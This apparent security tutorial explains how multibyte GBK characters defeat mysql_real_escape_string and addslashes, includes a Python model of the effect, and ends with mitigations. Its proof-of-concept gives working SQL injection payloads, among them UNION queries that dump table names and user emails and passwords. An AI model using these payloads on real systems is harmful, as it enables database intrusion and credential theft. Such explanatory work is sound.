MultiByte SQL Injection – Bypasses MySql Real Escape String And AddSlashes Protection

MySQL Real Escape String & AddSlashes:

In simple terms, it is a MySQL library function that escapes the special characters in a string. A sample call is as follows:

mysqli_real_escape_string($connstring, $id);

The function adds an escape character, the backslash (\), before certain potentially dangerous characters in the string passed to it. The characters escaped are \x00, \n, \r, \, ', " and \x1a.

When a malicious user sends a payload like

select * from users where id=" (payload here) "; - > (payload= " or "1"="1-- )

This will be filtered by the mysql_real_escape_string() function as follows

select * from users where id=" (payload here) "; - > (payload filtered like= \" or \"1\"=\"1-- )

The addslashes() function works in the same way.

MySQL Charsets:

MySQL supports several character sets by default. You can list them in your MySQL console as follows.

mysql> SHOW CHARACTER SET;
+--------------------+---------------------------------+
| CHARACTER_SET_NAME | DESCRIPTION                     |
+--------------------+---------------------------------+
| big5               | Big5 Traditional Chinese        |
| cp932              | SJIS for Windows Japanese       |
| eucjpms            | UJIS for Windows Japanese       |
| euckr              | EUC-KR Korean                   |
| gb18030            | China National Standard GB18030 |
| gb2312             | GB2312 Simplified Chinese       |
| gbk                | GBK Simplified Chinese          |
| sjis               | Shift-JIS Japanese              |
| ujis               | EUC-JP Japanese                 |
+--------------------+---------------------------------+

MultiByte Injection:

We are already familiar with mysql_real_escape_string(), which adds a backslash (%5c) before our quote (%27). The catch is that when I put %bf or %af in front of the quote (%27), the result is converted as follows.

%bf' -> %bf%5c' (here %bf%5c becomes the Chinese ¿ character, which is already present in the gbk character set)

%af' -> %af%5c' (here %af%5c becomes the Chinese ┐ character, which is already present in the gbk character set)

In this way the backslash is absorbed into the multibyte character and the quote is left unescaped, so we can break the SQL query and SQL injection happens again.
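
The byte-level effect described above, modelled in Python as an added example (not code from the original post). naive_escape() is a hypothetical stand-in for an escaper that does not know the connection character set, and the sample input is constructed.

```python
# Added illustration; naive_escape() is a hypothetical stand-in for an
# escaper that works byte by byte without knowing the connection charset.
SPECIAL = b"\x00\n\r\\'\"\x1a"  # the characters the article lists as escaped

def naive_escape(raw: bytes) -> bytes:
    """Put a backslash (0x5c) before every special byte."""
    out = bytearray()
    for b in raw:
        if b in SPECIAL:
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def live_quotes(escaped: bytes, charset: str) -> int:
    """Count quotes that are NOT backslash-escaped once the bytes are
    decoded in the charset the server uses for the connection."""
    text = escaped.decode(charset, errors="replace")
    count = i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2            # a backslash neutralises the next character
            continue
        if text[i] in "'\"":
            count += 1        # this quote can close the string literal
        i += 1
    return count

def charset_absorbs_backslash(charset: str) -> bool:
    """True if some lead byte turns 0x5c into the tail of one character,
    i.e. byte-wise escaping is unsafe for this connection charset."""
    for lead in range(0x80, 0x100):
        try:
            if len(bytes([lead, 0x5C]).decode(charset)) == 1:
                return True
        except UnicodeDecodeError:
            continue
    return False

if __name__ == "__main__":
    sample = b"\xbf'abc"  # constructed input using the article's %bf lead byte
    for cs in ("latin-1", "utf-8", "gbk"):
        print(cs, live_quotes(naive_escape(sample), cs),
              charset_absorbs_backslash(cs))
```

A result of 0 live quotes means the escaping held for that character set; 1 means the quote survived and can close the string literal.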

Proof Of Concept:

To make it very clear, I made a sample demo application that provides a simple search functionality.

Here I am using %bf' to break the query.

I need column details in order to make union queries, so I did a quick search like

%bf' order by 10--

Yup, we got the columns. Next I need table names. Our search query will be

%bf' union all select 1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10 from mysql.innodb_table_stats where database_name=schema();-- 

Finally, dumping the credentials.

%bf' union all select 1,group_concat(email,0x0a,password),3,4,5,6,7,8,9,10 from users-- 

Mitigations:

  • Trust No One: remember this and sanitize everything that comes from front-end users.
  • Prepared statements, stored procedures and parameterized queries will defend properly against these attacks.

